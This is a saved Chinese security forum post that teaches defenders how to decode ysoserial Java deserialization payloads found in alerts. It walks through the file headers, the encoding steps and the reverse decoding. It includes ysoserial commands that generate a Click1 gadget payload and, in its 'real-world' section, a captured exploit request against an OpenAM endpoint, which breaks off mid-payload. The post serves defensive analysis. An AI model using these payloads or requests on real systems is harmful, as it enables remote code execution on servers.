<!DOCTYPE html> <html><!--
|
|||
|
|
Page saved with SingleFile
|
|||
|
|
url: https://forum.butian.net/share/2785
|
|||
|
|
--><meta charset=utf-8>
|
|||
|
|
<meta http-equiv=X-UA-Compatible content="IE=edge">
|
|||
|
|
<meta name=viewport content="width=device-width, initial-scale=1">
|
|||
|
|
<meta name=csrf-token content=VD0owLiLrat8LaN2vBAqJtnLFngrtZgXtzYM7DqG>
|
|||
|
|
<title>一种 ysoserial.jar 反序列化Payload的解码</title>
|
|||
|
|
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
|
|||
|
|
<meta name=description content="奇安信攻防社区-一种 ysoserial.jar 反序列化Payload的解码">
|
|||
|
|
<meta name=author content="QIANXIN Team">
|
|||
|
|
<meta name=copyright content="2021 QIANXIN.com">
|
|||
|
|
<style>@media(max-width:767px){}</style>
|
|||
|
|
<style>/*!
|
|||
|
|
* Bootstrap v3.4.1 (https://getbootstrap.com/)
|
|||
|
|
* Copyright 2011-2019 Twitter, Inc.
|
|||
|
|
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
|
|||
|
|
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:active,a:hover{outline:0}img{border:0}textarea{color:inherit;font:inherit;margin:0}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{-webkit-tap-highlight-color:rgba(0,0,0,0)}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}h2,h3{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}h3{margin-top:20px;margin-bottom:10px}h3{font-size:24px}p{margin:0 0 10px}@media(min-width:768px){}ul{margin-top:0;margin-bottom:10px}@media(min-width:768px){}code{color:#c7254e}pre{display:block;margin:0 0 10px;color:#333;word-break:break-all;border:1px solid #ccc}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width:768px){.container{width:750px}}@media(min-width:992px){.container{width:970px}}@media(min-width:1200px){.container{width:1170px}}.row{margin-right:-15px;margin-left:-15px}.col-xs-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-12{float:left}.col-xs-12{width:100%}@media(min-width:768px){}@media(min-width:992px){.col-md-9{float:left}}@media(min-width:1200px){}@media screen and (max-width:767px){}@media screen and (-webkit-min-device-pixel-ratio:0){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-device-width:480px) and 
(orientation:landscape){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}@media screen and (min-width:768px){}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@media(min-width:768px){}@media(min-width:992px){}@media all and (transform-3d),(-webkit-transform-3d){}@media screen and (min-width:768px){}.btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.modal-header:after,.modal-header:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{display:table;content:" "}.btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal 
.form-group:after,.modal-footer:after,.modal-header:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}@-ms-viewport{width:device-width}@media(max-width:767px){}@media(max-width:767px){}@media(max-width:767px){}@media(max-width:767px){}@media(min-width:768px) and (max-width:991px){}@media(min-width:768px) and (max-width:991px){}@media(m
|
|||
|
|
<style>/*!
|
|||
|
|
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
|
|||
|
|
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
|
|||
|
|
*/@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}</style>
|
|||
|
|
<style>@media(min-width:1200px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}textarea{font-family:inherit;font-size:inherit;line-height:inherit}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mt-10{margin-top:10px}.taglist-inline{list-style:none;padding:0;font-size:0}.taglist-inline li{padding:0;font-size:13px}.taglist-inline>li{display:inline-block;margin-right:5px}.taglist-inline>li:last-child{margin-right:0}.widget-article .quote{padding:25px;background:#f3f5f9;line-height:24px;overflow:hidden}@media(min-width:768px){}.word-wrap{word-wrap:break-word;word-break:normal}::-webkit-scrollbar{width:6px;height:6px}::-webkit-scrollbar-thumb{background-color:#e4e6eb;outline:0;border-radius:2px}::-webkit-scrollbar-track{box-shadow:none;border-radius:2px}</style>
|
|||
|
|
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}</style>
|
|||
|
|
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment,.hljs-variable{color:green}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-string{color:#a31515}.hljs-meta{color:#2b91af}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#242
92f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h2{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body 
a:not([href]){color:inherit;text-decoration:none}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom
|
|||
|
|
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<script src="/static/js/html5shiv.min.js"></script>
|
|||
|
|
<script src="/static/js/respond.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) 
translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes 
bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
* Waves v0.7.5
|
|||
|
|
* http://fian.my.id/Waves
|
|||
|
|
*
|
|||
|
|
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
|
|||
|
|
* Released under the MIT license
|
|||
|
|
* https://github.com/fians/Waves/blob/master/LICENSE
|
|||
|
|
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes 
sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes 
swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
|
|||
|
|
<body>
|
|||
|
|
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main">
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">一种 ysoserial.jar 反序列化Payload的解码</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
ysoserial大家平时多用于生成Payload,但是作为蓝队,我们更多的是想法子去解码Payload!
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>0x00 前言
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
小伙伴在分析告警的时候,发现反序列化告警,Payload类似`AKztAA`,不知道咋解,于是有了本文。
|
|||
|
|
|
|||
|
|
0x01 文件头
|
|||
|
|
--------
|
|||
|
|
|
|||
|
|
开始之前,先来复习一下涉及到的几个文件头
|
|||
|
|
|
|||
|
|
以`rO0AB`开头,java序列化base64编码的数据
|
|||
|
|
以`aced`开头,java序列化的16进制
|
|||
|
|
以上两个,都可以用 <https://github.com/phith0n/zkar> 和 <https://github.com/NickstaDB/SerializationDumper> 去解析
|
|||
|
|
|
|||
|
|
以`cafebabe`开头,java class文件的16进制,保存成class,拖到idea中反编译
|
|||
|
|
|
|||
|
|
有了这些文件头信息,下面就可以开始用ysoserial.jar生成Payload了
|
|||
|
|
|
|||
|
|
0x02 原始payload
|
|||
|
|
--------------
|
|||
|
|
|
|||
|
|
生成Payload
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" > raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
查看生成的Payload的十六进制
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
hexdump -C raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
显然,以`aced`开头,java序列化的16进制,使用`zkar`解析
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./zkar dump -f raw_payload.bin > raw_payload_decode.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后查看生成的文件,应该可以找到下图:
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
以`cafebabe`开头,java class文件的16进制,保存成class,拖到idea中反编译即可。
|
|||
|
|
|
|||
|
|
0x03 编码替换的Payload
|
|||
|
|
-----------------
|
|||
|
|
|
|||
|
|
我们在日常分析的时候,java反序列化的漏洞,可能看到的是下面的`AKztAAV`开头的Payload(序列化数据前面多了一个空字节,`00 ac ed 00 05 73` 经过base64编码后就是`AKztAAVz`,所以开头不是常见的`rO0AB`)。对于这类Payload的解码流程,基本上就是先补等号,替换`_`和`-`为`/`和`+`,然后base64解码,跳过开头的空字符,最后的结果丢给zkar解析就行。如果zkar解析出来有看到`ca fe`开头的十六进制,就把它提取出来,保存成class文件,最后将class文件丢给idea反编译,即可看到攻击者最终想要执行的命令了。有点乱?没关系,下面我们会一步步分析。
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
这种Payload 一般执行如下命令:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
命令的意思是,使用`ysoserial.jar`生成一个指定`Click1`这个gadget 去执行`touch /tmp/xx`命令的序列化的Payload,然后在该Payload的前面插入一个空字节(`\x00`),之后对其进行base64编码,编码后的内容,将`/` 替换为 `_`,和 `+` 替换为 `-`,最后将`=`去掉。
|
|||
|
|
|
|||
|
|
&gt; 替换`/`和`+`是因为 base64 编码的输出可能包含 `/` 和 `+` 字符,这些字符在 URL 中有特殊含义,因此需要替换成其他字符以避免问题。
|
|||
|
|
|
|||
|
|
拆开如下:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" > raw_payload.bin
|
|||
|
|
cat raw_payload.bin | (echo -ne \\x00 && cat) > raw_payload_00.bin
|
|||
|
|
cat raw_payload_00.bin | base64 > raw_payload_00_base64.bin
|
|||
|
|
cat raw_payload_00_base64.bin | tr '/+' '_-' | tr -d '=' > raw_payload_00_base64_replace.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
因此,我们反着来,即可一步步还原,先处理第四步,替换和等号的问题,等号需要根据字符串长度补充(补到长度是4的倍数)
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat raw_payload_00_base64_replace.bin | tr '_-' '/+' > restore_raw_payload_00_base64_replace_lack_equal.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后执行下面的shell脚本
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
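#!/bin/bash
# Restore the '=' padding that was stripped from a base64 string.
# Reads restore_raw_payload_00_base64_replace_lack_equal.bin from the current
# directory and prints the padded string on stdout.

file_content=$(cat restore_raw_payload_00_base64_replace_lack_equal.bin)

# Drop line breaks (LF and CR) so that only the base64 characters are counted.
base64_string=$(printf '%s' "$file_content" | tr -d '\r\n')

# A padded base64 string always has a length that is a multiple of 4.
length=${#base64_string}
remainder=$((length % 4))

case "$remainder" in
    0) padding_string='' ;;
    2) padding_string='==' ;;
    3) padding_string='=' ;;
    1)
        # No valid base64 string has length % 4 == 1, so the value was most
        # likely cut short (for example by a log or alert field). Pad as
        # before so the intact part can still be decoded, and say so on
        # stderr so the message does not end up in the redirected output.
        echo "warning: length $length is not a valid base64 length; input looks truncated" >&2
        padding_string='==='
        ;;
esac

echo "$base64_string$padding_string"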
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./add_equal.sh > restore_raw_payload_00_base64_replace.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这时候我们可以比对一下,看看是否还原成功
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
接下来开始还原第三步,base64解码即可:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat restore_raw_payload_00_base64_replace.bin | base64 -d > restore_raw_payload_00.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
然后是第二步,跳过开头的空字节:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
tail -c +2 restore_raw_payload_00.bin > restore_raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
最后就是拿过去让`zkar`解析了,这里不再重复了
|
|||
|
|
|
|||
|
|
0x04 实战
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
拿到攻击者的请求:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBh